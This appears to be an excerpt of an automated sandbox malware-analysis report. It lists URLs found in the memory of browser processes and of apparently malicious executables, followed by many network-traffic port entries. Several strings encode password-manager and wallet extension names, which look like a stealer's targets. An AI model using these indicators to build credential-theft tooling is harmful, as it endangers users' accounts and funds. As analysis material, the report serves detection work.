Source: firefox.exe, 0000001D.00000002.3370593805.000001B636485000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3102037549.000051F400CFC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3081682081.000051F400C94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3087735865.000051F400CFC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3083154211.000051F400C94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3081757392.000051F400CFC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3095111983.000051F400C94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3083558841.000051F400CA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3077017697.000051F40049C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3083881095.000051F400CFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: firefox.exe, 0000001D.00000002.3483013862.000001B63DC03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/
Source: firefox.exe, 0000001D.00000002.3370593805.000001B636485000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3129286342.000001B63DD7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3136226178.000001B63DD7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3138982106.000001B63DDDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3068223683.000001B635761000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3068004981.000001B63573F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: 3e169c0a7e.exe, 00000009.00000003.2900557208.00000000053A9000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.2900874990.00000000053A6000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.2900671533.00000000053A6000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2926351246.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2925930815.0000000005B6D000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2926030012.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3041989367.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3041685223.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3041600113.0000000005B19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/policies/privacy/
Source: firefox.exe, 0000001D.00000002.3483013862.000001B63DC2C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3068223683.000001B635761000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3068004981.000001B63573F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3191369944.000001B625DE8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3489841190.000001B63DFC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/searchLOAD_RECORD_START_REQUEST_DELAYget
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 0000001D.00000002.3453320165.000001B6381A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3499653000.000019553EF00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3418311411.000001B636A64000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iqiyi.com/https://vk.com/
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.leboncoin.fr/
Source: firefox.exe, 0000001D.00000002.3250256598.000001B631E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3489841190.000001B63DFE6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3270733549.000001B63336D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3540303643.0000000000C24000.00000040.00000001.01000000.0000000C.sdmp, 7fb3e2a1d2.exe, 0000000E.00000002.3540303643.0000000000BF6000.00000040.00000001.01000000.0000000C.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: 3e169c0a7e.exe, 0000000F.00000003.3076713428.0000000005E0B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3439828011.000001B637439000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: firefox.exe, 0000001D.00000003.3158885940.000001B6371AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3153854845.000001B637150000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3540303643.0000000000C24000.00000040.00000001.01000000.0000000C.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: 3e169c0a7e.exe, 0000000F.00000003.3076713428.0000000005E0B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3439828011.000001B637439000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3540303643.0000000000BF6000.00000040.00000001.01000000.0000000C.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: 3e169c0a7e.exe, 00000009.00000003.2934254155.0000000005698000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2961117016.0000000005C54000.00000004.00000800.00020000.00000000.sdmp, 7fb3e2a1d2.exe, 0000000E.00000003.3449546235.0000000029B9F000.00000004.00000020.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3076713428.0000000005E0B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3434987290.000001B637205000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3439828011.000001B637439000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3540303643.0000000000C24000.00000040.00000001.01000000.0000000C.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3540303643.0000000000C24000.00000040.00000001.01000000.0000000C.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: 3e169c0a7e.exe, 0000000F.00000003.3076713428.0000000005E0B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3439828011.000001B637439000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/new/
Source: firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/new/resource:///modules/UrlbarPrefs.sys.mjsstartQuery/
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: 3e169c0a7e.exe, 00000009.00000003.2934254155.0000000005698000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2961117016.0000000005C54000.00000004.00000800.00020000.00000000.sdmp, 7fb3e2a1d2.exe, 0000000E.00000003.3449546235.0000000029B9F000.00000004.00000020.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3076713428.0000000005E0B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3434987290.000001B637205000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3439828011.000001B637439000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3540303643.0000000000C24000.00000040.00000001.01000000.0000000C.sdmp, 7fb3e2a1d2.exe, 0000000E.00000002.3540303643.0000000000BF6000.00000040.00000001.01000000.0000000C.sdmp, firefox.exe, 0000001D.00000002.3245912168.000001B63155D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001D.00000002.3245912168.000001B63155D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/J
Source: 3e169c0a7e.exe, 00000009.00000003.2934254155.0000000005698000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2961117016.0000000005C54000.00000004.00000800.00020000.00000000.sdmp, 7fb3e2a1d2.exe, 0000000E.00000003.3449546235.0000000029B9F000.00000004.00000020.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3076713428.0000000005E0B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3439828011.000001B637439000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3540303643.0000000000BF6000.00000040.00000001.01000000.0000000C.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/kZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGp
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3540303643.0000000000BF6000.00000040.00000001.01000000.0000000C.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/vRm9ybXxwbmxjY21vamNtZW9obHBnZ21mbmJiaWFwa21ibGlvYnwxfDB8MHx
Source: firefox.exe, 0000001D.00000002.3175730584.0000006635F3C000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.orgo
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F25000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3472196282.000001B639533000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3500451733.00002CF9CA51D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com
Source: firefox.exe, 0000001D.00000002.3499653000.000019553EF00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3418311411.000001B636A64000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3483013862.000001B63DC44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 0000001D.00000002.3489841190.000001B63DFD8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.widevine.com/
Source: firefox.exe, 0000001D.00000002.3499653000.000019553EF00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3418311411.000001B636A64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.wykop.pl/
Source: firefox.exe, 0000001D.00000002.3480721237.000001B63DB36000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631F73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3483013862.000001B63DC44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 0000001D.00000002.3426676265.000001B636CF0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warningThe
Source: firefox.exe, 0000001D.00000002.3497366247.000014FC8A604000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yandex.com
Source: firefox.exe, 0000001D.00000002.3463287311.000001B6386D5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3496249008.000006C56F700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3370593805.000001B63643D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3191369944.000001B625DE8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3457407606.000001B6383C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com
Source: firefox.exe, 0000001D.00000002.3358961878.000001B636103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3463287311.000001B6386E5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3457407606.000001B6383F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/
Source: firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account
Source: firefox.exe, 0000001D.00000002.3328453437.000001B635C1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=ht
Source: firefox.exe, 0000001D.00000002.3463287311.000001B6386D5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3191369944.000001B625D5D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3188876352.000001B625AA0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3439828011.000001B637425000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3439828011.000001B637403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3245912168.000001B6315AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3191369944.000001B625D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3461394505.000001B638597000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3467356104.000001B6393BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3439828011.000001B637439000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3248030030.000001B6316DA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3191369944.000001B625D6B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 0000001B.00000002.3049095713.0000018870C57000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3058142412.0000020BA4617000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3189759780.000001B625B39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 0000001D.00000002.3194860072.000001B62769E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3194860072.000001B627660000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdThe
Source: firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/accountremoveDocumentStateListenerget
Source: firefox.exe, 0000001D.00000002.3496249008.000006C56F700000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.comZ

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50131 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50211 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 50452 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50506
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50505
Source: unknown	Network traffic detected: HTTP traffic on port 50165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50508
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50507
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50325 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50292 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 50359 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50189 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50507 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50337 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50153 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50405 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 50235 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 50382 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
